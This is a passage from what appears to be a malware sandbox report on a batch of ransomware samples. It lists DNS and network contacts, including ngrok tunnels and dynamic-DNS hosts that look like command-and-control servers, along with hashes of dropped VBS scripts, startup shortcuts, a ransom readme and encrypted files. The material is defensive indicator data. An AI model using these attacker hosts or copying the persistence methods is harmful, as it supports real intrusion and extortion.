| US | 8.8.8.8:53 | 231.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.tcp.ngrok.io | udp |
| US | 8.8.8.8:53 | 236.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.0.127.10.in-addr.arpa | udp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 165.0.127.10.in-addr.arpa | udp |
| US | 13.58.157.220:10093 | 8.tcp.ngrok.io | tcp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 164.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.0.127.10.in-addr.arpa | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 159.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.0.127.10.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 152.0.127.10.in-addr.arpa | udp |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | securebiz.org | udp |
| US | 8.8.8.8:53 | astdg.top | udp |
| US | 8.8.8.8:53 | 176.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bobrat1111.ddns.net | udp |
| US | 8.8.8.8:53 | ibram.zapto.org | udp |
| US | 8.8.8.8:53 | grene231.ddns.net | udp |
| US | 8.8.8.8:53 | flestriche.xyz | udp |
| US | 8.8.8.8:53 | 172.0.127.10.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 181.0.127.10.in-addr.arpa | udp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 13.58.157.220:10093 | 8.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3hjfk33o.23s.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3252-163-0x000001F7ADA40000-0x000001F7ADA62000-memory.dmp
memory/3252-164-0x000001F7ADE00000-0x000001F7ADE44000-memory.dmp
memory/3252-165-0x000001F7ADED0000-0x000001F7ADF46000-memory.dmp
memory/3252-167-0x000001F7ADE90000-0x000001F7ADEAE000-memory.dmp
memory/3628-172-0x0000022E6D4C0000-0x0000022E6D4C1000-memory.dmp
memory/3628-173-0x0000022E6D4C0000-0x0000022E6D4C1000-memory.dmp
memory/3628-171-0x0000022E6D4C0000-0x0000022E6D4C1000-memory.dmp
memory/3628-179-0x0000022E6D4C0000-0x0000022E6D4C1000-memory.dmp
memory/3628-183-0x0000022E6D4C0000-0x0000022E6D4C1000-memory.dmp
memory/3628-182-0x0000022E6D4C0000-0x0000022E6D4C1000-memory.dmp
memory/3628-181-0x0000022E6D4C0000-0x0000022E6D4C1000-memory.dmp
memory/3628-180-0x0000022E6D4C0000-0x0000022E6D4C1000-memory.dmp
memory/3628-177-0x0000022E6D4C0000-0x0000022E6D4C1000-memory.dmp
memory/3628-178-0x0000022E6D4C0000-0x0000022E6D4C1000-memory.dmp
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
| MD5 | 6bd369f7c74a28194c991ed1404da30f |
| SHA1 | 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643 |
| SHA256 | 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d |
| SHA512 | 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | d2fb266b97caff2086bf0fa74eddb6b2 |
| SHA1 | 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d |
| SHA256 | b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a |
| SHA512 | c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Blocker.gen-0531fa8add852becdab7c5235a9de90de117c0c6b06dcbcc58a397538e968f96.exe
| MD5 | 9d02de8e771827f73c26a3d669e579d7 |
| SHA1 | 4a8cdec5afa86832bafd59f17812896b47c4464f |
| SHA256 | 0531fa8add852becdab7c5235a9de90de117c0c6b06dcbcc58a397538e968f96 |
| SHA512 | daa07f74ab83c2c6bd183b679aa5cd9e055985f402bae968ee422cab4a056cad0a5b7ae5e30f65846eb041711f203751b809f75efc35cdd46920275a55787dc6 |
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Encoder.gen-4066d357b55fb66801389baf183151f514a74093f933750966557652f748aedb.exe
| MD5 | 97e242c9bc7eaff55e3e0e40c2c530b8 |
| SHA1 | f47f8064e0a619557970fdbf4b4958255bab7d62 |
| SHA256 | 4066d357b55fb66801389baf183151f514a74093f933750966557652f748aedb |
| SHA512 | c4834c1c256a1b1331cb00b49397f2a217e206c6de41fbb484bf3f4714aeb1a32c927a8019a68a32d3a7ba35cccdd59bdb4a93ed13bd0110d93e07fffcb5ffca |
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Encoder.gen-880823dd9df0ca6047cd829a1031e8a167ccec0629fdeac40a097dd555debf7c.exe
| MD5 | 711486a19e8b011528dee34a5d25776e |
| SHA1 | 7e131940fce4d157d0a338b8285e8e2298e8677d |
| SHA256 | 880823dd9df0ca6047cd829a1031e8a167ccec0629fdeac40a097dd555debf7c |
| SHA512 | 9213dc1b1ab70e6672e6bef43a50125e7752de303ddbdbfc5b395f3b228363dd57c036befb21c83945207954575b90021af0d4e1f6872253c20475f3dbc4e894 |
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-3cb05ab0775975ad282e45b9b01a702c0896fa9ab1ac1e1c136ecfaf40fb7a6f.exe
| MD5 | a77d1c0a395df82450985f142f9ae383 |
| SHA1 | 3562481619eae9ab3e4e2a353a7a134178bd62e3 |
| SHA256 | 3cb05ab0775975ad282e45b9b01a702c0896fa9ab1ac1e1c136ecfaf40fb7a6f |
| SHA512 | 681b87c6412fa7e08afeaaec43cbdc8d42a7adc1ff0b5bbe7758803b590f7c44efcd19eb0b2582b1f563585f7dc1c3e9c01b0bd28da11abe578579bc72b4d50b |
memory/4244-210-0x0000000000810000-0x0000000000838000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-b6e7072f1cafe3fc7ddc0e2dbb1e40b997b3824d606572ead26c33fefb20f153.exe
| MD5 | 101b558457868065952e67ed8db39e07 |
| SHA1 | dd1e73f1d4539abf7f70c6cae16d8466093cf99b |
| SHA256 | b6e7072f1cafe3fc7ddc0e2dbb1e40b997b3824d606572ead26c33fefb20f153 |
| SHA512 | 9e09d15a18c6d7ef8e4fbd754da3830ca6fa4f6ece1ed28594fa63622ad0fb66f80a2c45ad9f777a9d8b1680cf7a8c1266a3bf3963fd1f6a725b046c4140287f |
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-c00db1eba5ba7fcd234c6a568ff9ae60bb3f343da199d0db8cd9b11308603a4d.exe
| MD5 | 164651e3f142e4aec14ea0716a217064 |
| SHA1 | 63b608ba0c59407c312a83ee788392c99bc13642 |
| SHA256 | c00db1eba5ba7fcd234c6a568ff9ae60bb3f343da199d0db8cd9b11308603a4d |
| SHA512 | 6bef7221251a851b35c12c3f0c50d5d8412601e97f49a273e5da1b62dcf70d0841d864e625ee01b89f0b69866be7ab3b3f65f3ef577a97297de04f4bd035fe20 |
memory/1092-217-0x0000000000630000-0x000000000064C000-memory.dmp
memory/1932-219-0x0000000000860000-0x0000000000898000-memory.dmp
memory/3668-220-0x0000000000B30000-0x0000000000BFA000-memory.dmp
memory/888-221-0x000000001B490000-0x000000001B95E000-memory.dmp
memory/1092-224-0x00000000053F0000-0x0000000005994000-memory.dmp
memory/888-227-0x000000001BAD0000-0x000000001BB32000-memory.dmp
memory/1092-225-0x0000000004F00000-0x0000000004F92000-memory.dmp
memory/888-223-0x000000001B960000-0x000000001BA06000-memory.dmp
memory/3668-222-0x0000000005470000-0x00000000054D6000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Gen.gen-c432a01904467c55ef316fec2973f10e09f1a1053faf574683c5097174caaa38.exe
| MD5 | 1ccef1fb6b247ffd5d2aae2106d4ed7b |
| SHA1 | 3d8a1ed377a331561a69dad902104a6e016332d9 |
| SHA256 | c432a01904467c55ef316fec2973f10e09f1a1053faf574683c5097174caaa38 |
| SHA512 | ddb4cfb41a45c9782be248bcbaafb4943a6b7a7d2845acec910d809db9a4e440939944212d43247d81edc88d7e79faef47a041f840d9496343fedf30dfc4146d |
memory/4664-263-0x0000000000040000-0x000000000007E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RSW.exe
| MD5 | d39dea43665c9fc80ad6b12c0a21d011 |
| SHA1 | 1691d0ca2bde1b5184dce9a7c52a0663f9bebac3 |
| SHA256 | 95a6b94edd616dbafd9f307b35e794be2392f9fdf40e69940f60ad181492ce3c |
| SHA512 | 69554e79382a3705e0e83709a7c2302943c5880f4bb817f11baca6250fc91e189f06201be3e6484110ad2fb4de27bf2ea1bef40bff4104f839e646ca150f4fb8 |
memory/4664-265-0x0000000004940000-0x000000000494A000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
| MD5 | 6da3c7796bca2f47f11e8711a945cf1d |
| SHA1 | e65df27b70ba3206d216a49b43f6beb2095cfe1b |
| SHA256 | d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131 |
| SHA512 | 6f76e6f2ac37ae6bef73e5bc9e8b0e1f5dc6240fa7bbba8ab4cf99fbe8cb697c39d9a25add2128936f061a667e72b5f45f3da3b9151af84b5982d707e207bcee |
memory/4464-272-0x000000001BAC0000-0x000000001BB5C000-memory.dmp
memory/3936-271-0x0000000000760000-0x0000000000782000-memory.dmp
memory/4464-273-0x0000000000870000-0x0000000000878000-memory.dmp
memory/4464-274-0x000000001BD20000-0x000000001BD6C000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Blocker.gen-a267e0d83b4ece8957283582de37e53a2d0d66938a29ca621592f5ccf0b416a8.exe
| MD5 | 2264ada61405b71a4463920c1a421f30 |
| SHA1 | c3831def50c14cf2f2bd8213e0746eeadbf5e8c0 |
| SHA256 | a267e0d83b4ece8957283582de37e53a2d0d66938a29ca621592f5ccf0b416a8 |
| SHA512 | b9b849d491f21dbf8493ad0a3e106be90188a9d9032c5766e7f77382525f5742cad108b08382ef74feb6109897ffe6793de9e1758a206227b51bbad0fc361e9e |
memory/3668-280-0x0000000006070000-0x000000000608E000-memory.dmp
memory/3668-281-0x00000000061D0000-0x0000000006280000-memory.dmp
C:\Users\Admin\Desktop\AssertSave.rle
| MD5 | 3017c4844e7a528d147642ff4b1736d1 |
| SHA1 | 4f7459feeb1b794ec741597687ed5ee924c0882e |
| SHA256 | 4388bd9d5ffa64ac5afbd79df2248633ac1205011c1dda7bf6127c4092f5c954 |
| SHA512 | 5e9a5e06c4c8588dae2568012bd07422b685fe60d00c9bcc69e225a5a0da25386856a8c43508252ea29d038ab689291fbf384930ab00b72ffcdf84b877d1608b |
C:\Users\Admin\AppData\Local\Temp\desktop.vbs
| MD5 | 9799504fa700bdad9f993cca7072cc22 |
| SHA1 | 2a421ddd72956493c8260a04e9b3498597aef182 |
| SHA256 | 332c867c272d155f4757d178323bf7b22cad57e488f438f71262753464e2a4a3 |
| SHA512 | 20d6f19db1a0ca2b8bf080d005c5088f6697ffa93b510b164c4f1245490d1a85de8e65e6d4dd6245c4e93ce72a46f910f2d67f547540cc46e87d7beac508e64c |
\??\c:\users\admin\desktop\00460\heur-trojan-ransom.win32.blocker.gen-adf56d5514f9ff609943983010d3fc67ac0b29d5f92ac9adc25bafba79bad88a.exe
| MD5 | f0b68ddc0bef98205b22b8bccec05436 |
| SHA1 | 87a8ca516fbbb6a34bb8f4dd5a6f3930b64e90c9 |
| SHA256 | adf56d5514f9ff609943983010d3fc67ac0b29d5f92ac9adc25bafba79bad88a |
| SHA512 | 4b052079bcded8571e589cf945430fd0607fa7a2d97d066ee1c60f96787abb2517e6c85ea87f61f2936fdd1e016d7a00a8ba0a5d552d2f13e9808bc2e6a30e7c |
C:\Users\Admin\AppData\Local\Temp\task.vbs
| MD5 | c1226b6e0bc40a68fc81ac6c9c358073 |
| SHA1 | e915af4192de7b84f0cf7f5137807c9e559621d6 |
| SHA256 | 2d335606cfd8568f833c016e3f9f9c7fc8a36f0e99d72b40568cfcf0d6e2d1e3 |
| SHA512 | a1dac61ca1b8ece1295071f84bfb1c992ed3c1753c6c93c8f07dacebdc05193e9b161d38c67f26aea4a4ea8e5cd5dd9a8de1731c932706839c216274b6b6fa4c |
C:\Users\Admin\AppData\Local\Temp\windowdefender.vbs
| MD5 | fda44de30fe9eb60c6f62da36be484a6 |
| SHA1 | d413ba9d18dd5d81e1ce2c038fe91a51db1ac5f6 |
| SHA256 | 311a3392f28bf0e5bf83ac74b28fd7d435bf514fda3e69fb1d5a4c05029e28e8 |
| SHA512 | 29aa29beb18f91a1edcb10fbfc43bc76be632c4cde05b09505da182d14440cc19f9c03855080d7b80dc54bf2e210cc096fde0e80071251898f47b288d737ce34 |
memory/852-295-0x0000000000400000-0x0000000002D02000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Conti.gen-53b1c1b2f41a7fc300e97d036e57539453ff82001dd3f6abf07f4896b1f9ca22.exe
| MD5 | 290c7dfb01e50cea9e19da81a781af2c |
| SHA1 | 8a52c7645ec8fd6c217dfe5491461372acc4e849 |
| SHA256 | 53b1c1b2f41a7fc300e97d036e57539453ff82001dd3f6abf07f4896b1f9ca22 |
| SHA512 | be2f45b5cc110bc9c4e61723eb111e53d70f3e32757915a9a945589a5296e3a667afdf5978f7002869005f961d705058ffafd2076d44471b7826237c76e11d4d |
C:\Users\Admin\AppData\Local\Temp\t.vbs
| MD5 | c578d9653b22800c3eb6b6a51219bbb8 |
| SHA1 | a97aa251901bbe179a48dbc7a0c1872e163b1f2d |
| SHA256 | 20a98a7e6e137bb1b9bd5ef6911a479cb8eac925b80d6db4e70b19f62a40cce2 |
| SHA512 | 3ae6dc8f02d1a78e1235a0782b632972da5a74ab32287cc41aa672d4fa4a9d34bb5fc50eba07b6915f2e61c402927cd5f6feeb7f7602afa2f64e91efb3b7fc4d |
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
| MD5 | 17a2564bda8ec94004266e90ae620937 |
| SHA1 | 84910b1d8c306f4b4b2eacbd74c3e13d37768130 |
| SHA256 | f9788ca182b0754299da35e1619675df74b431814b67241854f8b30fc563d0fa |
| SHA512 | d1be86d15424dbc2963509a9b0d812d026336d15333840697dce782427bfd4fae2a73b24940532786cf603c1df96faa95d14dd5ec34bc1558f591e0c5ff38ddb |
C:\Users\Admin\AppData\Local\Temp\preventchangedesktop.bat
| MD5 | e2217bd35f0d452be424c37c1c11a9d1 |
| SHA1 | d77aa3c2e85aaed7978bcac806fea74f6caf7dd6 |
| SHA256 | 47aff42728af2299f903de8bbf36c8bfa8839df26c9d05044af7060ea230dc1d |
| SHA512 | a6da0f27540f6b863b52ce9e2a96461207b74a311ced0def141622a6ec17a62e301e0db6a00a7f1f05af7948f7b8f6a3fde2792df4ec856dee9283d664db93db |
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Convagent.gen-e139a350242af220a379940c1a667891161ff92bdcdbb5acd024076a27ddbf56.exe
| MD5 | 898f0ec3d9588199aa00da724447b5bb |
| SHA1 | 0a5a6aa8a1e8fb83b71516d9086d899836410ba2 |
| SHA256 | e139a350242af220a379940c1a667891161ff92bdcdbb5acd024076a27ddbf56 |
| SHA512 | ff309a380ec33837425f4eaf64de9dbdf1f2446024e93a2ca67bc3b5749c8f417be82e1043858cd45a614d14b3d84fb67537457067e6fb95154dae0271d6fb09 |
memory/3632-314-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\Desktop\AssertSave.rle.MALWAREDEVELOPER
| MD5 | c522458aa08c0d731a2792f2e41a6174 |
| SHA1 | 7f09ebdd4bfc859b48b80a6087c957104dbbc98f |
| SHA256 | 4a48f7350e13850539b6d56bb2b18e0310f459816ff6196e7a47a6af1581e748 |
| SHA512 | d63cc8cd117337d8386e9b3906553ed4ceacd6f4ee5e9fb70db3c82c85b60ebb70b4d100ef049bd1b73989c4f035e0f531156c74223560693e9abf0b443b84aa |
memory/3176-321-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4264-325-0x0000000000400000-0x00000000007CE000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c1c40c13de318e8fa290dbb71c1b69be489b0d86abe65a39130e19d5b3eab28b.exe
| MD5 | 1581f5103a83713f50316c7c36d7aae1 |
| SHA1 | 0a1f93e33ae9a9b63aa691bc5e9256f8c3bc1e03 |
| SHA256 | c1c40c13de318e8fa290dbb71c1b69be489b0d86abe65a39130e19d5b3eab28b |
| SHA512 | 020426dbe9c9458cd58fa08e8dccafa84bedf9c8299006e5d017f6dd434cd1410c8392065dee4d67012a7b02e159bb383fae181cceb93b37ec55c3d247741f26 |
memory/4072-329-0x0000000000400000-0x00000000005BB000-memory.dmp
memory/2560-330-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4264-323-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/3368-333-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Foreign.gen-e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0.exe
| MD5 | c5dd4df325b14e58cf851e0bcb617953 |
| SHA1 | fc47da7c0c4d7d26f300ac70b44748d47eafe960 |
| SHA256 | e742a50fc5dc16f9ac7ca253fce897b08ccbb2dcbf579f137d3e6adba61fc7c0 |
| SHA512 | d6f32e64e5d169823a8f2f7e60f7c6ac24cc274c5ed3eba5767f6150566fb9d0f371c0c6f1167eea70e00333b609883b2d383009bb901962d4b69aa2c9a641c9 |
memory/2188-339-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\Desktop\CompareAssert.vst.MALWAREDEVELOPER
| MD5 | 17a7c1c82c8b8bbff5db13bbc03121f7 |
| SHA1 | b8d0547b59de2450b302712a8dd8f12ece6f9aeb |
| SHA256 | 79233c8200d3807b66a12dd3d2607e79017aa21054404b2c1a74793bfd53c815 |
| SHA512 | b749148cb5db7f5ef07c08a487e8f9de3f14422e76875fec733df47c08e1d5df1b1ae2f60bfc0b0552a8a9df146680956de3d4e260463dc757602e48107bb78a |
C:\Program Files\7-Zip\7-zip.chm.exe
| MD5 | efe04bc27f7ea8378da4bcbd23a209aa |
| SHA1 | 84035c3532a0d198eb400ac40b8600dd54f362a9 |
| SHA256 | 39634ed473ffe7e278db78fd68c01e99a78723d17cbac188bfbef01f2c4d5ac2 |
| SHA512 | ba5936d902192a832e07df5349709b194050e6720b56903dbe40ef99f2d81d5a55f8f95c4ff1d0e78ebf989720eef6d839dbeef5f1b23194149ed8a22bb1f385 |
memory/3860-348-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4264-353-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/2344-354-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4264-361-0x0000000070B30000-0x0000000070B69000-memory.dmp
memory/2120-369-0x0000000000400000-0x0000000000943000-memory.dmp
memory/4264-370-0x0000000070B90000-0x0000000070BC9000-memory.dmp
memory/4264-368-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/2944-374-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4264-362-0x0000000000400000-0x00000000007CE000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba.exe
| MD5 | 2f2d4eb24662c916f822f9c3fd55c9b2 |
| SHA1 | 9d5bda347f70b8f928803a28782a1018d9f2d0e0 |
| SHA256 | 4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba |
| SHA512 | 1cc68736ac883a60f1113f183fa68b344b86dffc6b3853dbabbc626eb02fd69b9eb3801891c07193ab3684419e7346d4a1d0c37a5de6523df0dabae1b0051bb5 |
memory/3612-383-0x0000000000400000-0x000000000044B000-memory.dmp
memory/3612-382-0x0000000000400000-0x000000000044B000-memory.dmp
memory/3612-379-0x0000000000400000-0x000000000044B000-memory.dmp
memory/3612-378-0x0000000000400000-0x000000000044B000-memory.dmp
memory/5412-399-0x0000000000720000-0x0000000000721000-memory.dmp
memory/5412-400-0x00000000007E0000-0x00000000007E1000-memory.dmp
memory/3612-398-0x0000000010480000-0x00000000104F0000-memory.dmp
memory/5164-397-0x0000000000400000-0x000000000041E000-memory.dmp
memory/3612-393-0x0000000010410000-0x0000000010480000-memory.dmp
memory/3612-377-0x0000000000400000-0x000000000044B000-memory.dmp
memory/3612-376-0x0000000000400000-0x000000000044B000-memory.dmp
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Generic-82a55487bd1c3b53eb0f0bee7483cae09792605e323b1df4b234582d21366d39.exe
| MD5 | 402cbc09109fbe9492924da0a07d43cf |
| SHA1 | 6d1f1f99d07317ba3be2ac84130e3ad9a891f8b4 |
| SHA256 | 82a55487bd1c3b53eb0f0bee7483cae09792605e323b1df4b234582d21366d39 |
| SHA512 | d59c9c68bd4b5306d6c8bd46a7691e3f071c999ac2f33196f4f76d291b88522a536480df279574e1854541ec3b96d644fdbe720b76c40889c2d075d0d033fad0 |
memory/5596-415-0x0000000000390000-0x000000000044E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reload1.lnk
| MD5 | 704f0ad39b0caa3cb618bea36fee6bd2 |
| SHA1 | 82486a7c523afd4dccacc82ed7208283ec844f0f |
| SHA256 | 4ed13f35691b22ae04540575917580930055a19c8dcc2d2dcc0f8a6429be6cdb |
| SHA512 | e2406f3beee62e9475b85f9e47f7b4e29f801f065a68627ccdc78a02d10c644f10a1292c408c466635d240f5e4855470014210492641b39610b26a19f43d3438 |
memory/4264-520-0x0000000070200000-0x0000000070239000-memory.dmp
memory/4072-546-0x0000000000400000-0x00000000005BB000-memory.dmp
memory/5492-550-0x00000000008E0000-0x0000000000A0C000-memory.dmp
C:\Recovery\readme.txt
| MD5 | a48d7f2cbc55c406561016d717163111 |
| SHA1 | 6cbc2ffadf3975cf9c8d24576fa4db9d7c3e9443 |
| SHA256 | f6c83d830b9375ec7bb8f3485d5cae945c6bf79d95a3909fb444a8078d081bdd |
| SHA512 | 88023e98ebff62ba2e9de1b61a4f20c93c54037ce06977327ebc3474546473ce23ed6211b7a8adebe2f3153be92509c95df3766ff018aa0f5311f6897388530b |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 40e6b14b25d5bddc79922015e40dad0a |
| SHA1 | 430d2e0022389009766e26165402ee28e7788e7d |
| SHA256 | d43fe057f7297b96f95805d9f3ca27336322301a290b77ceec72cc650f09d6f0 |
| SHA512 | 84c99934e69e72c9fa836fa344589ab45deb11b8e7858f3b6cfb785b0d9f8c7fccd1ed231f690305a5bedcfbe6f5e0847e8b67a241e6e06007641a63c0fb0a57 |
C:\Users\Admin\AppData\Local\Temp\Admin8
| MD5 | 3e50bb2a0af03e8529618f4513ec7942 |
| SHA1 | 26dd4342167e7f2993290d1ddcd32b797c7390f9 |
| SHA256 | ac7c406c363d29e27629019c38c43a942f1ce490f1d5224444622f4be798f06b |
| SHA512 | a53f757ab961f657dbb6b859639b6f62822b02da561d2d36483d9a216ade1c97ab45c9a40aa016a051bd52109c7207f67740c28e30f8c89082442fd7a25275d2 |
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\setup_install.exe
| MD5 | 406d02580356f58973767d44a36c1ab4 |
| SHA1 | e843c74f9034795ca1c9b6f678254bbbe690f11b |
| SHA256 | a582f169c887d3f99836730aea8978680c847f9331a44025c9257eb8fd549b6e |
| SHA512 | 943140a3bc411646f1c284f64895c2a9291c5f4682bba98e21fe1fcd36d6745d68f28e5200b379ad3a8150b363ca55d69483fa1772caf7a8435a91f40d3cf4e5 |
memory/5564-1028-0x0000000000400000-0x000000000051E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Admin7
| MD5 | 1c65629f71870a8c967901b3f351bc98 |
| SHA1 | bc39711919c2e059cf132417b13bf1a437621611 |
| SHA256 | 3a5512d5c13e68c4e7b7d64f024055b264bb84aa37961f990dc4500003c0735f |
| SHA512 | 1534cd267d4488829179bac0d3a56f613846c48fd331c9912dad8953a6793bebe0128031a20a70a9c33b8515ee3c807404a79937432f827cb7ef5727d2703acd |
memory/5992-1064-0x0000000000EE0000-0x00000000011DC000-memory.dmp
memory/5564-1085-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Admin7
| MD5 | 022cda66eacdd236ea4b0b41364c9382 |
| SHA1 | 044601a0d409938aaa605a894921b76349129273 |
| SHA256 | 855c0dc22b19ae72e7a1864d9601eb70ceeee0e2b52ec34712c4fe5228b1d63b |
| SHA512 | 311db7144d3d5f413cdda192faa658191cbfedd539fa6c82a5f6e7e951789e3035a691a7cd6a673efda137d27f76133d4d1bd33ea2a56734c87feaab760536ae |
memory/5564-1084-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/5564-1083-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Admin7
| MD5 | 343373ece872103b543453ee8983318e |
| SHA1 | 24c4a81b3d0ca75ce17d79780f30ad0b0a4f202a |
| SHA256 | 6696888030b5d9db39abed7a8cf8369a72a536ca921159a7e1fe3c9b55f84957 |
| SHA512 | 3d7e50c47a474c88758ea091935abaa99090d8f9526e3238f8ac39d3de61a5d0ecfcdfd20c26dc8c9b71409e948c7f6f401de4561b721bfea2bc4b76fc700210 |
C:\Users\Admin\AppData\Local\Temp\discord.exe
| MD5 | 93aef6f81e2343ca4f9e6de80be14432 |
| SHA1 | 4f969cc385caedca9842cda4005a133d92e22acb |
| SHA256 | 93a3e2d70c70d80f4aa5621ee461b2e3efad001a5fc6e4ebe5b6e31420386e6c |
| SHA512 | 0cfb796554b3665b404a5510f31245b4acc71550e300350e340d056da53f8642016c3b4dca3d741d854a41a9661abe57c0a258964292b870a52dabf84464ee36 |
memory/6200-1128-0x0000000000DF0000-0x0000000000DF8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Admin7
| MD5 | 6da0c3e54fc5f591b452e2f7c976f624 |
| SHA1 | 38c925f1383eab0ed4d40f8a13339f8fd6e023c0 |
